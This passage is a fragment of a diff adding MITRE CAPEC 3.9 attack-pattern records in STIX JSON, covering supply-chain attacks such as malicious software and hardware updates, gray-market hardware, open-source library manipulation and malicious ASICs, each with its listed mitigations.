"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2a0121e-af78-418e-8352-df07cee6f77e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.", + "id": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7aadd9ce-2c81-4af1-8711-9aec554535b9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker introduces malicious code to the victim's system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location. These manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user to click a URL. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. Thus the attacker has in their arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface.", + "external_references": [ + { + "external_id": "CAPEC-533", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/533.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Sean Endicott, Fake Microsoft update used in malicious email attack campaign, 2021--07, Microsoft News", + "external_id": "REF-710", + "source_name": "reference_from_CAPEC", + "url": "https://www.msn.com/en-us/news/technology/fake-microsoft-update-used-in-malicious-email-attack-campaign/ar-AALTcVs" + } + ], + "id": "attack-pattern--83c7d2ff-f74e-471b-bd10-28421e818719", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Manual Software Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An email campaign was initiated, targetting victims of a ransomware attack. The email claimed to be a patch to address the ransomware attack, but was instead an attachment that caused the Cobalt Strike tools to be installed, which enabled further attacks." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the download and update installation processes.", + "Advanced knowledge about the deployed system and its various software subcomponents and processes." + ], + "x_capec_skills_required": { + "High": "Able to develop malicious code that can be used on the victim's system while maintaining normal functionality." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only accept software updates from an official source.", + "id": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-533-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2561ff45-4348-494c-9576-fa1268c134d8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "target_ref": "attack-pattern--83c7d2ff-f74e-471b-bd10-28421e818719", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.", + "external_references": [ + { + "external_id": "CAPEC-534", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/534.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Omer Shwartz, Amir Cohen, Asaf Shabtai, Yossi Oren, Shattered Trust: When Replacement Smartphone Components Attack, 11th USENIX Workshop on Offensive Technologies, 2017, USENIX", + "external_id": "REF-711", + "source_name": "reference_from_CAPEC", + "url": "https://www.usenix.org/system/files/conference/woot17/woot17-paper-shwartz.pdf" + } + ], + "id": "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Hardware Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366" + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.", + "external_references": [ + { + "external_id": "CAPEC-535", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/535.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Gray Market Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer's expensive upgrade to their flagship system. The victim has installed the manufacturer's base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromise the victim." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to a gray market reseller's hardware components supply, or the ability to appear as a gray market reseller to the victim's buyer." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase only from authorized resellers.", + "id": "course-of-action--40c4e278-b931-4403-8378-b8bb91f97e2f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-535-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a606707-ece1-4dc2-9b9e-beaac8a94648", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--40c4e278-b931-4403-8378-b8bb91f97e2f", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate serial numbers from multiple sources", + "id": "course-of-action--ef2f0f49-2527-4176-8440-e40e618ad631", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-535-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe59f444-2244-4606-8c27-be7408eace85", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef2f0f49-2527-4176-8440-e40e618ad631", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-536", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/536.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--be032a5f-7575-4e82-86d8-6c5cabb3d9dd", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Data Injected During Configuration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary wishes to bypass a security system to access an additional network segment where critical data is kept. The adversary knows that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. The adversary knows the bypass will work but also will be detected within the logging data of the security system. The adversary waits until an upgrade is performed to the security system by the victim's system administrators, and the adversary has access to an external logging system. The adversary injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an adversary bypass to be detected. The adversary stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The adversary is then able to bypass the security system." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine configuration process: The adversary, through a previously compromised system, either remotely or physically, determines what the configuration process is. They look at configuration files, data files, and running processes on the system to identify areas where they could inject malicious data.

  2. Determine when configuration occurs: The adversary needs to then determine when configuration or recalibration of a system occurs so they know when to inject malicious data.

    3. Techniques
    Look for a weekly update cycle or repeated update schedule.
    Insert a malicious process into the target system that notifies the adversary when configuration is occurring.

Experiment

  1. Determine malicious data to inject: By looking at the configuration process, the adversary needs to determine what malicious data they want to insert and where to insert it.

    2. Techniques
    Add false log data
    Change configuration files
    Change data files

Exploit

  1. Inject malicious data: Right before, or during system configuration, the adversary injects the malicious data. This leads to the system behaving in a way that is beneficial to the adversary and is often followed by other attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have previously compromised the victim's systems or have physical access to the victim's systems.", + "Advanced knowledge of software and hardware capabilities of a manufacturer's product." + ], + "x_capec_skills_required": { + "High": "Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper access control is implemented on all systems to prevent unauthorized access to system files and processes.", + "id": "course-of-action--5a991a71-810a-4fb9-ba49-7ad88b6ccca5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-536-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb32fca6-85ac-4fed-ab7a-d07e0bf5d9bb", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a991a71-810a-4fb9-ba49-7ad88b6ccca5", + "target_ref": "attack-pattern--be032a5f-7575-4e82-86d8-6c5cabb3d9dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, leveraging the ability to manipulate components of primary support systems and tools within the development and production environments, inserts malicious software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim's organization, for the purpose of disruption or further compromise.", + "external_references": [ + { + "external_id": "CAPEC-537", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/537.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Infiltration of Hardware Development Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n The adversary, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the adversary to remotely compromise the adjacent hardware development system from the manufacturer's workstation. The adversary is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The adversary must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify software downloads and updates to ensure they have not been modified be adversaries", + "id": "course-of-action--aba55887-195f-49b2-b2cf-5d26b34dd710", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7ffabfce-822a-4165-a38e-cb6682cc1b01", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aba55887-195f-49b2-b2cf-5d26b34dd710", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage antivirus tools to detect known malware", + "id": "course-of-action--a602fd92-93fd-42f5-9926-a7a31904ce6d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5232e2c2-76f2-413b-b430-174a1e5c5e40", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a602fd92-93fd-42f5-9926-a7a31904ce6d", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not download software from untrusted sources", + "id": "course-of-action--557960a1-b40a-4a60-8750-d1649c2bbea2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7c96fb42-fe4c-4ecc-a424-bf85159f9b92", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--557960a1-b40a-4a60-8750-d1649c2bbea2", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc17b843-2585-4684-b2b8-386159db9f64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.", + "external_references": [ + { + "external_id": "CAPEC-538", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/538.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Supply Chain Compromise: Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--ca626464-877a-4f42-83b7-7451cfe71a38", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Open-Source Library Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The adversary commits the change to the code which is picked up by a manufacturer who develops VPN software. It is eventually deployed at the victim's location where the very specific conditions are met giving the adversary the ability to sniff plaintext traffic thought to be encrypted. This can provide to the adversary access to sensitive data of the victim." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine the relevant open-source code project to target: The adversary will make the selection based on various criteria:

Experiment

  1. Develop a plan for malicious contribution: The adversary develops a plan to contribute malicious code, taking the following into consideration:

Exploit

  1. Execute the plan for malicious contribution: Write the code to be contributed based on the plan and then submit the contribution. Multiple commits, possibly using multiple identities, will help obscure the attack. Monitor the contribution site to try to determine if the code has been uploaded to the target system.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location." + ], + "x_capec_skills_required": { + "High": "Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to the development environment process of an application-specific integrated circuit (ASIC) for a victim system being developed or maintained after initial deployment can insert malicious functionality into the system for the purpose of disruption or further compromise.", + "external_references": [ + { + "external_id": "CAPEC-539", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/539.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--bfb711d6-f12d-496e-88b9-2c0184485976", + "modified": "2022-09-29T00:00:00.000Z", + "name": "ASIC With Malicious Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "A hardware manufacturer periodically updates its ASIC with new features. The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for ASIC design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent ASIC development system. The attacker is then able to exfiltrate and alter sensitive data on the ASIC system, allowing for future compromise once a new AISC is deployed at the victim location." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have working knowledge of some if not all of the components involved in the target system as well as the infrastructure and development environment of the manufacturer.", + "Advanced knowledge about the ASIC installed within the target system." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious subroutines for an ASIC environment without degradation of existing functions and processes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.", + "external_references": [ + { + "external_id": "CAPEC-54", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/54.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + } + ], + "id": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Query System for Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + 